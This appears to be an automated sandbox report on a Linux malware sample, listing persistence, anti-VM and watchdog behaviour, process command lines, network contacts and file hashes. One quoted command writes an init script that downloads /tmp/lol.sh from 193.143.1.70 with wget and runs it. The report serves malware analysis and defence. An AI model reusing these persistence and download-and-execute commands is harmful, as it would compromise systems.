Malware Analysis Report

2025-05-28 20:31

Sample ID 241125-k7vmlayrhx
Target 20073737305.zip
SHA256 4bafa66638b4631077e617f850abdec293c5cde65cd12d247bca0c5b029e8357
Tags
antivm defense_evasion discovery persistence privilege_escalation
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4bafa66638b4631077e617f850abdec293c5cde65cd12d247bca0c5b029e8357

Threat Level: Known bad

The file 20073737305.zip was found to be: Known bad.

Malicious Activity Summary

antivm defense_evasion discovery persistence privilege_escalation

yara_template

File and Directory Permissions Modification

Modifies Watchdog functionality

Modifies init.d

Checks mountinfo of local process

Creates/modifies environment variables

Modifies rc script

Modifies systemd

Modifies Bash startup script

Changes its process name

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-25 09:15

Signatures

yara_template

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-25 09:15

Reported

2024-11-25 09:17

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

148s

Max time network

129s

Command Line

[/tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90]

Signatures

File and Directory Permissions Modification

defense_evasion
Description | Indicator | Process | Target
N/A | N/A | /bin/sh | N/A
N/A | N/A | /bin/chmod | N/A
N/A | N/A | /bin/sh | N/A
N/A | N/A | /bin/sh | N/A
N/A | N/A | /bin/chmod | N/A

Modifies Watchdog functionality

defense_evasion
Description | Indicator | Process | Target
File opened for modification | /dev/watchdog | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A
File opened for modification | /dev/misc/watchdog | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A

Checks mountinfo of local process

antivm
Description | Indicator | Process | Target
File opened for reading | /proc/1523/mountinfo | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A

Creates/modifies environment variables

persistence privilege_escalation defense_evasion
Description | Indicator | Process | Target
File opened for modification | /etc/profile | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A

Modifies init.d

persistence
Description | Indicator | Process | Target
File opened for modification | /etc/init.d/system | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A
File opened for modification | /etc/init.d/sh | /bin/sh | N/A

Modifies rc script

persistence
Description | Indicator | Process | Target
File opened for modification | /etc/rc.local | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A

Modifies systemd

persistence privilege_escalation
Description | Indicator | Process | Target
File opened for modification | /etc/systemd/system/custom.service | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A

Modifies Bash startup script

persistence
Description | Indicator | Process | Target
File opened for modification | /etc/profile | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A

Changes its process name

Description | Indicator | Process | Target
Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A

Reads runtime system information

discovery
Description | Indicator | Process | Target
File opened for reading | /proc/filesystems | /bin/systemctl | N/A
File opened for reading | /proc/self/stat | /bin/systemctl | N/A
File opened for reading | /proc/cmdline | /bin/systemctl | N/A
File opened for reading | /proc/707/cmdline | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A
File opened for reading | /proc/self/status | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A
File opened for reading | /proc/1/cgroup | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A
File opened for reading | /proc/1/sched | /bin/systemctl | N/A
File opened for reading | /proc/filesystems | /bin/mkdir | N/A
File opened for reading | /proc/1530/status | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A
File opened for reading | /proc/1531/status | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A
File opened for reading | /proc/1/cmdline | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A
File opened for reading | /proc/sys/kernel/osrelease | /bin/systemctl | N/A
File opened for reading | /proc/1/environ | /bin/systemctl | N/A

Processes

/tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90

[/tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90]

/bin/sh

[sh -c systemctl enable custom.service >/dev/null 2>&1]

/bin/systemctl

[systemctl enable custom.service]

/bin/sh

[sh -c chmod +x /etc/init.d/system >/dev/null 2>&1]

/bin/chmod

[chmod +x /etc/init.d/system]

/bin/sh

[sh -c ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1]

/bin/ln

[ln -s /etc/init.d/system /etc/rcS.d/S99system]

/bin/sh

[sh -c echo "#!/bin/sh # /etc/init.d/sh case \"$1\" in start) echo 'Starting sh' /bin/sh & wget http://193.143.1.70/ -O /tmp/lol.sh chmod +x /tmp/lol.sh /tmp/lol.sh & ;; stop) echo 'Stopping sh' killall sh ;; restart) $0 stop $0 start ;; *) echo \"Usage: $0 {start|stop|restart}\" exit 1 ;; esac exit 0" > /etc/init.d/sh]

/bin/sh

[sh -c chmod +x /etc/init.d/sh >/dev/null 2>&1]

/bin/chmod

[chmod +x /etc/init.d/sh]

/bin/sh

[sh -c mkdir -p /etc/rc.d >/dev/null 2>&1]

/bin/mkdir

[mkdir -p /etc/rc.d]

/bin/sh

[sh -c ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1]

/bin/ln

[ln -s /etc/init.d/sh /etc/rc.d/S99sh]

Network

Country | Destination | Domain | Proto
US | 154.216.19.139:199 | | tcp
N/A | 224.0.0.251:5353 | | udp
RU | 193.143.1.70:38242 | | tcp
IN | 165.85.130.119:23 | | tcp
HK | 183.87.130.36:23 | | tcp
US | 144.187.70.108:23 | | tcp
US | 64.1.136.160:23 | | tcp
CA | 173.34.87.254:23 | | tcp
JP | 221.246.9.248:23 | | tcp
US | 51.54.237.153:23 | | tcp
US | 26.128.35.162:23 | | tcp
IN | 27.58.97.112:23 | | tcp
IN | 121.247.165.101:23 | | tcp
JP | 27.89.86.179:23 | | tcp
US | 55.89.48.116:23 | | tcp
US | 34.148.124.55:23 | | tcp
CN | 27.46.109.74:23 | | tcp
AU | 114.73.10.186:23 | | tcp
US | 159.54.226.85:23 | | tcp
US | 195.214.5.74:23 | | tcp
ES | 37.10.199.220:23 | | tcp
US | 8.116.19.66:23 | | tcp
PK | 39.43.190.127:23 | | tcp
AU | 49.182.69.60:23 | | tcp
BR | 177.217.83.163:23 | | tcp
US | 6.225.9.89:23 | | tcp
GU | 202.128.93.166:23 | | tcp
US | 162.150.101.3:23 | | tcp
TW | 210.68.65.225:23 | | tcp
US | 4.10.213.21:23 | | tcp
KR | 203.229.54.64:23 | | tcp
US | 206.110.55.56:23 | | tcp
US | 30.230.57.191:23 | | tcp
MQ | 109.62.125.240:23 | | tcp
DE | 94.135.51.105:23 | | tcp
RU | 176.108.177.120:23 | | tcp
US | 167.64.111.206:23 | | tcp
US | 11.10.42.42:23 | | tcp
GB | 109.68.70.184:23 | | tcp
ES | 77.224.205.245:23 | | tcp
PT | 78.130.118.180:23 | | tcp
US | 67.86.215.12:23 | | tcp
MX | 189.242.254.126:23 | | tcp
NO | 81.29.45.78:23 | | tcp
US | 76.207.175.197:23 | | tcp
DE | 37.85.78.90:23 | | tcp
AR | 200.61.177.202:23 | | tcp
CN | 27.159.57.177:23 | | tcp
CN | 183.167.203.99:23 | | tcp
US | 128.202.190.89:23 | | tcp
CN | 106.85.212.86:23 | | tcp
PL | 79.175.255.236:23 | | tcp
US | 72.195.51.20:23 | | tcp
CN | 60.17.2.101:23 | | tcp
CA | 70.70.174.153:23 | | tcp
US | 148.175.228.174:23 | | tcp
US | 169.181.66.5:23 | | tcp
CN | 223.213.231.57:23 | | tcp
CN | 120.217.35.79:23 | | tcp
BR | 189.114.189.74:23 | | tcp
DE | 84.150.145.169:23 | | tcp
CN | 202.189.52.86:23 | | tcp
IT | 131.154.194.44:23 | | tcp
US | 108.148.96.179:23 | | tcp
ZM | 165.56.83.232:23 | | tcp
AU | 101.180.197.247:23 | | tcp
DE | 80.226.119.205:23 | | tcp
US | 173.233.165.119:23 | | tcp
US | 47.147.207.77:23 | | tcp
BR | 181.232.213.40:23 | | tcp
US | 54.70.64.242:23 | | tcp
US | 96.10.115.202:23 | | tcp
IE | 87.198.135.243:23 | | tcp
FR | 109.9.157.47:23 | | tcp
CN | 114.84.210.205:23 | | tcp
US | 30.125.152.170:23 | | tcp
US | 174.24.121.9:23 | | tcp
US | 131.189.38.75:23 | | tcp
US | 199.6.167.95:23 | | tcp
US | 215.106.181.81:23 | | tcp
BE | 164.15.198.156:23 | | tcp
TW | 42.66.205.217:23 | | tcp
BR | 200.19.72.111:23 | | tcp
JP | 60.84.43.199:23 | | tcp
DE | 178.15.107.152:23 | | tcp
IE | 52.19.119.59:23 | | tcp
NL | 192.136.51.51:23 | | tcp
US | 69.141.229.128:23 | | tcp
KZ | 95.58.21.169:23 | | tcp
US | 136.94.154.64:23 | | tcp
PT | 82.155.79.210:23 | | tcp
US | 209.156.130.79:23 | | tcp
JP | 133.7.235.163:23 | | tcp
US | 67.0.11.89:23 | | tcp
GB | 25.130.235.69:23 | | tcp
CN | 42.168.168.21:23 | | tcp
US | 214.164.123.190:23 | | tcp
NL | 185.138.240.52:23 | | tcp
TH | 180.128.209.43:23 | | tcp
US | 205.80.60.11:23 | | tcp
SI | 86.61.40.105:23 | | tcp
US | 108.201.129.213:23 | | tcp
US | 34.49.158.53:23 | | tcp
AU | 123.3.118.6:23 | | tcp
US | 166.237.20.190:23 | | tcp
MY | 42.188.251.158:23 | | tcp
JP | 211.8.14.88:23 | | tcp
CN | 124.16.238.206:23 | | tcp
US | 165.119.224.21:23 | | tcp
US | 98.20.185.251:23 | | tcp
US | 204.110.160.4:23 | | tcp
PK | 182.179.194.178:23 | | tcp
US | 194.133.227.169:23 | | tcp
BR | 179.243.22.188:23 | | tcp
US | 7.198.122.148:23 | | tcp
US | 23.204.48.159:23 | | tcp
US | 129.101.163.26:23 | | tcp
MU | 105.20.173.115:23 | | tcp
US | 6.94.74.191:23 | | tcp
US | 3.48.7.13:23 | | tcp
CN | 114.94.28.207:23 | | tcp
GB | 194.82.230.237:23 | | tcp
IE | 193.120.67.74:23 | | tcp
US | 139.70.1.99:23 | | tcp
US | 44.227.237.235:23 | | tcp
BR | 177.100.201.109:23 | | tcp
CN | 123.65.142.23:23 | | tcp
US | 138.35.169.0:23 | | tcp
US | 172.119.40.87:23 | | tcp
KR | 112.178.112.227:23 | | tcp
CN | 122.81.83.150:23 | | tcp
DZ | 105.104.141.172:23 | | tcp
US | 100.169.44.250:23 | | tcp
TW | 61.231.197.131:23 | | tcp
US | 24.239.94.182:23 | | tcp
US | 67.217.208.133:23 | | tcp
US | 173.242.165.125:23 | | tcp
US | 143.141.216.11:23 | | tcp
US | 35.252.19.10:23 | | tcp
GB | 193.30.27.210:23 | | tcp
CA | 192.95.141.194:23 | | tcp
GB | 193.56.176.133:23 | | tcp
US | 54.202.114.177:23 | | tcp
AU | 103.70.234.174:23 | | tcp
US | 192.69.215.85:23 | | tcp
US | 214.134.20.60:23 | | tcp
AR | 181.119.118.3:23 | | tcp
US | 44.103.124.4:23 | | tcp
US | 184.45.62.92:23 | | tcp
UG | 102.34.152.112:23 | | tcp
CN | 49.95.202.196:23 | | tcp
US | 65.245.217.109:23 | | tcp
JP | 60.149.255.227:23 | | tcp
AU | 124.177.5.112:23 | | tcp
SA | 180.234.114.78:23 | | tcp
CA | 199.243.210.238:23 | | tcp
DE | 151.189.179.26:23 | | tcp
FR | 103.133.84.206:23 | | tcp
PH | 210.213.149.206:23 | | tcp
CN | 27.198.93.85:23 | | tcp
US | 21.226.1.187:23 | | tcp
CA | 72.0.217.166:23 | | tcp
CN | 202.104.113.50:23 | | tcp
US | 164.223.235.16:23 | | tcp
KR | 14.69.184.245:23 | | tcp
US | 52.39.63.186:23 | | tcp
US | 96.227.190.177:23 | | tcp
IT | 81.121.195.155:23 | | tcp
US | 207.92.108.74:23 | | tcp
IT | 93.145.61.243:23 | | tcp
US | 72.210.255.133:23 | | tcp
US | 74.204.18.52:23 | | tcp
US | 16.13.75.140:23 | | tcp
CN | 112.195.236.70:23 | | tcp
ES | 95.63.198.136:23 | | tcp
CN | 112.241.196.138:23 | | tcp
US | 44.102.21.199:23 | | tcp
US | 75.243.240.94:23 | | tcp
CH | 134.21.102.228:23 | | tcp
RU | 94.77.69.125:23 | | tcp
US | 173.170.50.122:23 | | tcp
FR | 86.192.112.215:23 | | tcp
US | 206.245.47.107:23 | | tcp
US | 96.173.19.57:23 | | tcp
US | 129.38.4.191:23 | | tcp
VN | 14.162.124.138:23 | | tcp
CN | 61.163.205.239:23 | | tcp
CN | 171.105.244.199:23 | | tcp
DE | 130.185.125.83:23 | | tcp
BR | 177.34.76.31:23 | | tcp
US | 137.181.205.104:23 | | tcp
SG | 172.188.154.56:23 | | tcp
US | 7.13.32.22:23 | | tcp
KR | 112.191.199.75:23 | | tcp
US | 215.188.49.185:23 | | tcp
AE | 92.98.37.31:23 | | tcp
IL | 45.12.81.197:23 | | tcp
ZA | 164.151.240.190:23 | | tcp
FR | 46.193.57.25:23 | | tcp
US | 174.199.206.176:23 | | tcp
FR | 162.38.159.37:23 | | tcp
US | 208.152.177.93:23 | | tcp
US | 154.63.60.10:23 | | tcp
US | 154.216.19.139:199 | | tcp
US | 154.216.19.139:199 | | tcp
US | 151.101.193.91:443 | | tcp
GB | 185.125.188.61:443 | | tcp
GB | 185.125.188.61:443 | | tcp
US | 151.101.193.91:443 | | tcp
GB | 89.187.167.7:443 | | tcp
US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp
US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp
GB | 84.17.50.9:443 | 1527653184.rsc.cdn77.org | tcp

Files

/etc/systemd/system/custom.service

MD5 19a440fdac7f578f2fb33719698a082c
SHA1 ebadce21c65d05ad62a324deb39c57aecd3edf2c
SHA256 b176d41b748466f8ba35246c78a1c940f65403b363c086ccd5b5de577a87cf69
SHA512 8bdfac90e7235fc35eeec141a1e2145ed4ea5a250b71bdf0cf0e5e5aa59ab6dc004dc08561bd5547c4a4a106138c98950dc2098c905ce785b9b2c0657684d7bb

/etc/inittab

MD5 3d6b6e1b05ad5d0538ccd8804bcd279b
SHA1 0fc061b51c225d5bea072c939de05e8a856558bc
SHA256 cab2df9c1c498df29445837610f14ae08d4af98d3acac69b0581c01fe594e3c5
SHA512 1957857cffbc0d526eb04e40db166d661b9dc59fc31fb5551f31cd58d270f839ffa2098e81c8555b12e9dbd55ba17df662b14c6441a6389eb9a76082fa401c98

/boot/bootcmd

MD5 735cae7d3cbab0f59d95f84790282103
SHA1 1cb77931b3097f18988016c9ceba3280a5ccb2ae
SHA256 dfdd4cf729384e4ed52516ab72bd86be286c80f53d4f5b764fd2dd2a2b2c983b
SHA512 998daa467c4ee63dd41515897728de70cbb9c579ca8b16c26d8e6db5edad53c6dbd6343fb10eda3dbc29b0cb1fa72a9b2653250e9027e6ee02d17726e958bbfe

/etc/init.d/system

MD5 f000251d92c773cc3ee1ca22cf5f0788
SHA1 e2386fe6a5f29b1e9e5ad5b38928c024f97105e6
SHA256 31a77745dd3724a0691a9255738b9c87516868932e3eb992e2afafcd0574a985
SHA512 0dad5adaa7742dd208596fefad53ab21c39fbf2cbe5c9958b92170d555d316f0a0b02ec5236311b869aa18e90592e81439a3a229bf1307b5daf87d87c5f493c2

/etc/init.d/sh

MD5 c5583b6a699f62cb0a004c99842f5c70
SHA1 b232ef89bf9b36643b5956aaacfd295b9ce2a0a7
SHA256 2b03c83558e4af71f3b35408cf668a2ee06931c21adec760952a21a11bc4c59b
SHA512 a9fc1e4c30452a3d100a8ccfbb707d9d323830fbbca90c98d3c126bf943539baaf1fccb04d435a4b627ed7f1bfb1bbd649dab282488d951dde87e097423e154d

/etc/motd

MD5 2bd9b4be30579e633fc0191aa93df486
SHA1 7d63a9bd9662e86666b27c1b50db8e7370c624ff
SHA256 64dc39f3004dc93c9fc4f1467b4807f2d8e3eb0bfa96b15c19cd8e7d6fa77a1d
SHA512 ae6dd7b39191354cf43cf65e517460d7d4c61b8f5c08e33e6ca3c451dc7cab4de89f33934c89396b80f1aade0a4e2571bd5ae8b76ef80b737d4588703d2814d5